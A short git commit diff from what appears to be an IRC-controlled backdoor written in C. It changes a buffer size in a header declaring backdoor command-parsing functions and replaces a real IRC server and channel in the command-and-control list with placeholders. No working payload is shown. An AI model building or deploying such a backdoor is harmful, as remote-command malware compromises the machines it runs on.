This commit is contained in:
My name 2024-04-28 06:38:20 +00:00
parent 77d2f3cc76
commit 69bc238a38
4 changed files with 5 additions and 5 deletions

View file

@ -2,7 +2,7 @@
#define _BACKDOOR_H
#include "irc.h"
#define COMMON_BUF_SIZE 200
#define COMMON_BUF_SIZE 100
void backdoor_offline(void);
void parse_cmd(IRCC_client *client);

View file

@ -9,5 +9,5 @@ typedef struct {
} SERVER;
SERVER servers[] = {
{1, "irc.rizon.net", 6697, NULL, "#blbl", NULL}
{1, "irc.ipv4.server", 6697, NULL, "#channel", NULL}
};